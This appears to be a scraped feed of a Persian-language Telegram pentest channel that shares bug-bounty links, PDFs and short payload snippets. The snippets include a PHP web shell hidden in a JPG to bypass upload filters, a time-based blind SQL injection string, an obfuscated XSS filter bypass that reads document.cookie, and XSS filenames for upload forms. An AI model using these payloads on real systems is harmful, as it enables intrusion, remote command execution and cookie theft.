PenTest Team

🗒 Bypass Upload Tricky

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

@PenTest_Tm

18.6K viewsedited 17:54

PenTest Team

@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید

18.2K views18:54

PenTest Team

🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences

https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences

@PenTest_Tm

17.9K viewsedited 20:33

PenTest Team

🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method

https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos

@PenTest_Tm

21.0K views09:35

PenTest Team

🗒 How I was able to discover ATO Via IDOR vulnerability

https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481

@PenTest_Tm

22.5K views07:19

17.9K views08:24

A Bug Hunter's Diary.pdf

5.2 MB

@PenTest_Tm

21.7K views07:46

PenTest Team

🗒 SQLMap Command Generator

@PenTest_Tm

17.9K views12:49

PenTest Team

🗒SSTI - RCE - CI

https://dolomite-slip-02b.notion.site/SSTI-RCE-CI-76c2f9d2808649c197d08b0d0ecd0e5b?pvs=25

@PenTest_Tm

10.8K viewsedited 14:49

PenTest Team

bounty_tips_100+.pdf

18.3 MB

🗒 Bug Bounty Tips

@PenTest_Tm

6.6K views08:15

PenTest Team

🗒 XSS Payload Generator

تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست

@PenTest_Tm

5.7K views20:58

PenTest Team

🗒 Bypass File Upload Filtering

In image:

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg

@PenTest_Tm

4.3K views10:16

PenTest Team

🗒 SQL Injection

After this, use sqlmap to extract the database

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--

@PenTest_Tm

5.8K views17:42

PenTest Team

🗒 Bypass XSS Filter with Array

<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">

@PenTest_Tm

5.5K views20:37

PenTest Team

بچها عیدتون مبارک ایشالا سال خوبی داشته باشین❤️

5.2K views11:02

PenTest Team

🗒 File Upload via XSS

If you found a file upload function for an image, try introducing an image with XSS in the filename like so:

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

@PenTest_Tm

6.6K views19:16

PenTest Team

APIs Fuzzing for Bug Bounty.pdf

164.9 KB

🗒 APIs Fuzzing for Bug Bounty

@PenTest_Tm

7.0K views08:04

PenTest Team

TCM - Practical API Hacking.zip

2.8 GB

🗒 TCM - Practical API Hacking

@PenTest_Tm

8.3K views10:15

PenTest Team

API_Hacking_with_Javascript_Checklist.pdf

47.1 MB

🗒 API Hacking with Javascript Checklist

@PenTest_Tm

11.0K views15:04

PenTest Team

رسما بگا رفتیم احتمال زیاد وضعیت اینترنت خیلی بدتر میشه 🖤

3.5K viewsedited 12:30

2025/07/05 23:41:40
Back to Top

HTML Embed Code:

<iframe width="100%" src="https://www.bootg.com/buyppe/web?embed=1" title="Telegram Web" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>